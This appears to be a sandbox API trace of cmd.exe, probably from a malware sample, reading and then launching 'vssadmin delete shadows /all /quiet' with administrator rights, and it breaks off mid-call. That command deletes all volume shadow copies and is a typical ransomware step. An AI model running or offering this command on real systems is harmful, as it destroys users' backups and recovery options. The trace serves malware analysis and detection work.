[0067.355] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0067.355] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.356] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0067.356] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.356] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0067.356] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.356] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0067.356] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.356] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0067.356] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.356] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0067.357] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.357] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0067.357] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.357] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0067.358] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.358] GetFileType (hFile=0x120) returned 0x3 [0067.358] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.358] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.358] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.358] GetFileType (hFile=0x12c) returned 0x3 [0067.358] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.358] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0067.358] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x26f818, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f818*=0x24, lpOverlapped=0x0) returned 1 [0067.359] GetProcessHeap () returned 0x460000 [0067.359] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4012) returned 0x47cd20 [0067.359] GetProcessHeap () returned 0x460000 [0067.359] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47cd20 | out: hHeap=0x460000) returned 1 [0067.359] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0067.360] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0067.360] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0067.360] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0067.360] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0067.360] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0067.360] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0067.360] GetProcessHeap () returned 0x460000 [0067.360] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0) returned 0x4797e0 [0067.360] GetProcessHeap () returned 0x460000 [0067.360] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x22) returned 0x474610 [0067.361] GetProcessHeap () returned 0x460000 [0067.361] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x48) returned 0x4798a0 [0067.362] GetConsoleOutputCP () returned 0x1b5 [0067.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0067.362] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0067.362] GetConsoleTitleW (in: lpConsoleTitle=0x26f7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0067.362] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0067.362] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0067.362] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0067.362] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0067.362] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0067.363] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0067.363] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0067.363] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0067.363] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0067.363] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0067.363] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0067.363] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0067.363] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0067.363] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0067.363] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0067.363] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0067.363] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0067.363] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0067.363] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0067.363] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0067.363] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0067.363] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0067.363] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0067.363] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0067.363] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0067.363] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0067.363] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0067.363] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0067.363] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0067.363] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0067.363] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0067.363] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0067.363] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0067.363] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0067.363] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0067.363] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0067.363] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0067.363] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0067.363] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0067.363] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0067.363] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0067.364] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0067.364] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0067.364] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0067.364] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0067.364] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0067.364] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0067.364] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0067.364] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0067.364] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0067.364] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0067.364] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0067.364] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0067.364] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0067.364] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0067.364] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0067.364] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0067.364] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0067.364] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0067.364] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0067.364] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0067.364] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0067.364] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0067.364] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0067.364] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0067.364] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0067.364] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0067.364] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0067.364] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0067.364] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0067.364] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0067.364] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0067.365] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0067.365] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0067.365] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0067.365] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0067.365] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0067.365] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0067.365] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0067.365] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0067.365] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0067.365] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0067.365] GetProcessHeap () returned 0x460000 [0067.365] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x461ab0 [0067.365] GetProcessHeap () returned 0x460000 [0067.365] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5a) returned 0x461cd0 [0067.365] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0067.366] GetProcessHeap () returned 0x460000 [0067.366] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x420) returned 0x479a80 [0067.366] SetErrorMode (uMode=0x0) returned 0x1 [0067.366] SetErrorMode (uMode=0x1) returned 0x0 [0067.366] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x479a90, lpFilePart=0x26f060 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f060*="Desktop") returned 0x25 [0067.366] SetErrorMode (uMode=0x1) returned 0x1 [0067.366] GetProcessHeap () returned 0x460000 [0067.366] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479a80, Size=0x6e) returned 0x479a80 [0067.366] GetProcessHeap () returned 0x460000 [0067.366] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479a80) returned 0x6e [0067.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0067.366] GetProcessHeap () returned 0x460000 [0067.366] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x128) returned 0x475b70 [0067.366] GetProcessHeap () returned 0x460000 [0067.366] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x240) returned 0x479b00 [0067.372] GetProcessHeap () returned 0x460000 [0067.372] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479b00, Size=0x12a) returned 0x479b00 [0067.372] GetProcessHeap () returned 0x460000 [0067.372] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479b00) returned 0x12a [0067.372] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.372] GetProcessHeap () returned 0x460000 [0067.372] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe8) returned 0x479c40 [0067.372] GetProcessHeap () returned 0x460000 [0067.372] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479c40, Size=0x7e) returned 0x479c40 [0067.372] GetProcessHeap () returned 0x460000 [0067.372] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479c40) returned 0x7e [0067.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0067.374] GetLastError () returned 0x2 [0067.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0067.374] GetLastError () returned 0x2 [0067.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x461d40 [0067.374] GetProcessHeap () returned 0x460000 [0067.374] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x28) returned 0x474640 [0067.374] FindClose (in: hFindFile=0x461d40 | out: hFindFile=0x461d40) returned 1 [0067.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0067.375] GetLastError () returned 0x2 [0067.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x461d40 [0067.375] GetProcessHeap () returned 0x460000 [0067.375] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474640, Size=0x8) returned 0x4798f0 [0067.375] FindClose (in: hFindFile=0x461d40 | out: hFindFile=0x461d40) returned 1 [0067.375] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0067.375] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0067.375] GetConsoleTitleW (in: lpConsoleTitle=0x26f320, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0067.375] GetProcessHeap () returned 0x460000 [0067.375] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x21c) returned 0x479cd0 [0067.375] GetConsoleTitleW (in: lpConsoleTitle=0x479ce0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0067.375] GetProcessHeap () returned 0x460000 [0067.375] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479cd0, Size=0xc0) returned 0x479cd0 [0067.375] GetProcessHeap () returned 0x460000 [0067.375] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479cd0) returned 0xc0 [0067.375] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0067.376] GetProcessHeap () returned 0x460000 [0067.376] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479cd0 | out: hHeap=0x460000) returned 1 [0067.376] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f098 | out: lpAttributeList=0x26f0d8, lpSize=0x26f098) returned 1 [0067.376] UpdateProcThreadAttribute (in: lpAttributeList=0x26f0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f088, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f0d8, lpPreviousValue=0x0) returned 1 [0067.376] GetStartupInfoW (in: lpStartupInfo=0x26f1f0 | out: lpStartupInfo=0x26f1f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x120, hStdOutput=0x12c, hStdError=0x12c)) [0067.376] GetProcessHeap () returned 0x460000 [0067.376] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x474640 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0067.376] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0067.377] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0067.377] GetProcessHeap () returned 0x460000 [0067.377] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474640 | out: hHeap=0x460000) returned 1 [0067.377] GetProcessHeap () returned 0x460000 [0067.377] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x478900 [0067.377] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f110*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0c0 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x26f0c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x360, dwThreadId=0x290)) returned 1 [0067.389] CloseHandle (hObject=0x50) returned 1 [0067.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0067.389] GetProcessHeap () returned 0x460000 [0067.389] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47c230 | out: hHeap=0x460000) returned 1 [0067.389] GetEnvironmentStringsW () returned 0x47aa10* [0067.389] GetProcessHeap () returned 0x460000 [0067.389] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae8) returned 0x47b500 [0067.389] FreeEnvironmentStringsW (penv=0x47aa10) returned 1 [0067.389] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77a60000 [0067.390] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0067.390] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x26e9c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x26e9c8, ReturnLength=0x0) returned 0x0 [0067.390] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x26ea00, nSize=0x380, lpNumberOfBytesRead=0x26e9c0 | out: lpBuffer=0x26ea00*, lpNumberOfBytesRead=0x26e9c0*=0x380) returned 1 [0067.390] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0120.462] GetExitCodeProcess (in: hProcess=0x54, 